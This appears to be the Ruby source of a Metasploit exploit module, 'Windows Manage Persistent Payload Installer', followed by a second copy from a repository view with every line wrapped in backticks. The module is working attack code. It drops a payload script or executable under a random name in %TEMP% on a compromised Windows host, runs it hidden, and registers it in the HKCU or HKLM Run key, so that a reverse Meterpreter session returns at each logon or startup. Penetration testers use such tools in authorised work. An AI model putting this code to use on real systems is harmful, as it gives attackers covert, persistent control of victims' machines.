metasploit-framework/modules/exploits/windows/local/persistence.rb

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Msf::Post::Common
	include Msf::Post::File
	include Msf::Post::Windows::Priv
	include Msf::Post::Windows::Registry
	include Exploit::EXE

	def initialize(info={})
		super( update_info( info,
			'Name'          => 'Windows Manage Persistent Payload Installer',
			'Description'   => %q{
				This Module will create a boot persistent reverse Meterpreter session by
				installing on the target host the payload as a script that will be executed
				at user logon or system startup depending on privilege and selected startup
				method.

				REXE mode will transfer a binary of your choosing to remote host to be
				used as a payload.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Carlos Perez <carlos_perez[at]darkoperator.com>'
				],
			'Platform'      => [ 'win' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'Targets'       => [ [ 'Windows', {} ] ],
			'DefaultTarget' => 0,
			'DisclosureDate'=> "Oct 19 2011"
		))

		register_options(
			[
				OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
				OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
				OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']),
				OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
			], self.class)

	end

	# Run Method for when run command is issued
	#-------------------------------------------------------------------------------
	def exploit
		print_status("Running module against #{sysinfo['Computer']}")

		rexe = datastore['EXE::Custom']
		rexename = datastore['REXENAME']
		delay = datastore['DELAY']
		reg_val = datastore['REG_NAME']
		template_pe = datastore['EXE::Template']
		@clean_up_rc = ""
		host,port = session.session_host, session.session_port

		if rexe.nil?
			script = create_script(delay, template_pe)
			script_on_target = write_script_to_target(script,rexename)
		else
			alt_pay_exe = get_custom_exe
			script_on_target = write_exe_to_target(alt_pay_exe, rexename)
		end

		# Initial execution of script
		target_exec(script_on_target)

		case datastore['STARTUP']
		when /USER/i
			write_to_reg("HKCU", script_on_target, reg_val)
		when /SYSTEM/i
			write_to_reg("HKLM", script_on_target, reg_val)
		end

		clean_rc = log_file()
		file_local_write(clean_rc,@clean_up_rc)
		print_status("Cleanup Meterpreter RC File: #{clean_rc}")

		report_note(:host => host,
			:type => "host.persistance.cleanup",
			:data => {
				:local_id => session.sid,
				:stype => session.type,
				:desc => session.info,
				:platform => session.platform,
				:via_payload => session.via_payload,
				:via_exploit => session.via_exploit,
				:created_at => Time.now.utc,
				:commands =>  @clean_up_rc
			}
		)
	end

	# Function for Creating persistent script
	#-------------------------------------------------------------------------------
	def create_script(delay, altexe)
		if not altexe.nil?
			vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe})
		else
			vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay})
		end
		print_status("Persistent agent script is #{vbs.length} bytes long")
		return vbs
	end

	# Function for creating log folder and returning log path
	#-------------------------------------------------------------------------------
	def log_file(log_path = nil)
		#Get hostname
		host = session.sys.config.sysinfo["Computer"]

		# Create Filename info to be appended to downloaded files
		filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

		# Create a directory for the logs
		if log_path
			logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
		else
			logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
		end

		# Create the log directory
		::FileUtils.mkdir_p(logs)

		#logfile name
		logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
		return logfile
	end

	# Function for writing script to target host
	#-------------------------------------------------------------------------------
	def write_script_to_target(vbs,name)
		tempdir = session.fs.file.expand_path("%TEMP%")
		if name.nil?
			tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
		else
			tempvbs = tempdir + "\\" + name + ".vbs"
		end
		fd = session.fs.file.new(tempvbs, "wb")
		fd.write(vbs)
		fd.close
		print_good("Persistent Script written to #{tempvbs}")
		@clean_up_rc << "rm #{tempvbs}\n"
		return tempvbs
	end

	# Function to execute script on target and return the PID of the process
	#-------------------------------------------------------------------------------
	def target_exec(script_on_target)
		print_status("Executing script #{script_on_target}")
		if datastore['EXE::Custom'].nil?
			proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true})
		else
			proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
		end

		print_good("Agent executed with PID #{proc.pid}")
		@clean_up_rc << "kill #{proc.pid}\n"
		return proc.pid
	end

	# Function to install payload in to the registry HKLM or HKCU
	#-------------------------------------------------------------------------------
	def write_to_reg(key,script_on_target, registry_value)
		if registry_value.nil?
			nam = Rex::Text.rand_text_alpha(rand(8)+8)
		else
			nam = registry_value
		end

		print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")

		if(key)
			registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
			print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
		else
			print_error("Error: failed to open the registry key for writing")
		end
	end

	# Function for writing executable to target host
	#-------------------------------------------------------------------------------
	def write_exe_to_target(exe_raw, rexename)
		if rexename.nil?
			exe_name = Rex::Text.rand_text_alpha(rand(8)+8)
		else
			exe_name = rexename
		end

		tempdir = session.fs.file.expand_path("%TEMP%")
		tempexe = tempdir + "\\" + exe_name + ".exe"
		fd = session.fs.file.new(tempexe, "wb")
		fd.write(exe_raw)
		fd.close
		print_good("Persistent Script written to #{tempexe}")
		@clean_up_rc << "rm #{tempexe}\n"
		return tempexe
	end
end
Initial commit fo the migrated module 2013-02-07 23:11:44 +00:00			`##`
			`# ## This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/common'`
			`require 'msf/core/post/file'`
			`require 'msf/core/post/windows/priv'`
			`require 'msf/core/post/windows/registry'`
			`require 'msf/core/exploit/exe'`

			`class Metasploit3 < Msf::Exploit::Local`
			`Rank = ExcellentRanking`

			`include Msf::Post::Common`
			`include Msf::Post::File`
			`include Msf::Post::Windows::Priv`
			`include Msf::Post::Windows::Registry`
			`include Exploit::EXE`

			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Manage Persistent Payload Installer',`
			`'Description' => %q{`
			`This Module will create a boot persistent reverse Meterpreter session by`
			`installing on the target host the payload as a script that will be executed`
			`at user logon or system startup depending on privilege and selected startup`
			`method.`

			`REXE mode will transfer a binary of your choosing to remote host to be`
			`used as a payload.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Carlos Perez <carlos_perez[at]darkoperator.com>'`
			`],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'Targets' => [ [ 'Windows', {} ] ],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate'=> "Oct 19 2011"`
			`))`

			`register_options(`
			`[`
			`OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),`
			`OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),`
			`OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']),`
			`OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),`
			`], self.class)`

			`end`

			`# Run Method for when run command is issued`
			`#-------------------------------------------------------------------------------`
			`def exploit`
			`print_status("Running module against #{sysinfo['Computer']}")`

			`rexe = datastore['EXE::Custom']`
			`rexename = datastore['REXENAME']`
			`delay = datastore['DELAY']`
			`reg_val = datastore['REG_NAME']`
			`template_pe = datastore['EXE::Template']`
			`@clean_up_rc = ""`
			`host,port = session.session_host, session.session_port`

			`if rexe.nil?`
			`script = create_script(delay, template_pe)`
			`script_on_target = write_script_to_target(script,rexename)`
			`else`
			`alt_pay_exe = get_custom_exe`
			`script_on_target = write_exe_to_target(alt_pay_exe, rexename)`
			`end`

			`# Initial execution of script`
			`target_exec(script_on_target)`

			`case datastore['STARTUP']`
			`when /USER/i`
			`write_to_reg("HKCU", script_on_target, reg_val)`
			`when /SYSTEM/i`
			`write_to_reg("HKLM", script_on_target, reg_val)`
			`end`

			`clean_rc = log_file()`
			`file_local_write(clean_rc,@clean_up_rc)`
			`print_status("Cleanup Meterpreter RC File: #{clean_rc}")`

			`report_note(:host => host,`
			`:type => "host.persistance.cleanup",`
			`:data => {`
			`:local_id => session.sid,`
			`:stype => session.type,`
			`:desc => session.info,`
			`:platform => session.platform,`
			`:via_payload => session.via_payload,`
			`:via_exploit => session.via_exploit,`
			`:created_at => Time.now.utc,`
			`:commands => @clean_up_rc`
			`}`
			`)`
			`end`

			`# Function for Creating persistent script`
			`#-------------------------------------------------------------------------------`
			`def create_script(delay, altexe)`
			`if not altexe.nil?`
			`vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe})`
			`else`
			`vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay})`
			`end`
			`print_status("Persistent agent script is #{vbs.length} bytes long")`
			`return vbs`
			`end`

			`# Function for creating log folder and returning log path`
			`#-------------------------------------------------------------------------------`
			`def log_file(log_path = nil)`
			`#Get hostname`
			`host = session.sys.config.sysinfo["Computer"]`

			`# Create Filename info to be appended to downloaded files`
			`filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")`

			`# Create a directory for the logs`
			`if log_path`
			`logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )`
			`else`
			`logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )`
			`end`

			`# Create the log directory`
			`::FileUtils.mkdir_p(logs)`

			`#logfile name`
			`logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"`
			`return logfile`
			`end`

			`# Function for writing script to target host`
			`#-------------------------------------------------------------------------------`
			`def write_script_to_target(vbs,name)`
			`tempdir = session.fs.file.expand_path("%TEMP%")`
			`if name.nil?`
			`tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"`
			`else`
			`tempvbs = tempdir + "\\" + name + ".vbs"`
			`end`
			`fd = session.fs.file.new(tempvbs, "wb")`
			`fd.write(vbs)`
			`fd.close`
			`print_good("Persistent Script written to #{tempvbs}")`
			`@clean_up_rc << "rm #{tempvbs}\n"`
			`return tempvbs`
			`end`

			`# Function to execute script on target and return the PID of the process`
			`#-------------------------------------------------------------------------------`
			`def target_exec(script_on_target)`
			`print_status("Executing script #{script_on_target}")`
			`if datastore['EXE::Custom'].nil?`
			`proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true})`
			`else`
			`proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})`
			`end`

			`print_good("Agent executed with PID #{proc.pid}")`
			`@clean_up_rc << "kill #{proc.pid}\n"`
			`return proc.pid`
			`end`

			`# Function to install payload in to the registry HKLM or HKCU`
			`#-------------------------------------------------------------------------------`
			`def write_to_reg(key,script_on_target, registry_value)`
			`if registry_value.nil?`
			`nam = Rex::Text.rand_text_alpha(rand(8)+8)`
			`else`
			`nam = registry_value`
			`end`

			`print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")`

			`if(key)`
			`registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")`
			`print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")`
			`else`
			`print_error("Error: failed to open the registry key for writing")`
			`end`
			`end`

			`# Function for writing executable to target host`
			`#-------------------------------------------------------------------------------`
			`def write_exe_to_target(exe_raw, rexename)`
			`if rexename.nil?`
			`exe_name = Rex::Text.rand_text_alpha(rand(8)+8)`
			`else`
			`exe_name = rexename`
			`end`

			`tempdir = session.fs.file.expand_path("%TEMP%")`
			`tempexe = tempdir + "\\" + exe_name + ".exe"`
			`fd = session.fs.file.new(tempexe, "wb")`
			`fd.write(exe_raw)`
			`fd.close`
			`print_good("Persistent Script written to #{tempexe}")`
			`@clean_up_rc << "rm #{tempexe}\n"`
			`return tempexe`
			`end`
			`end`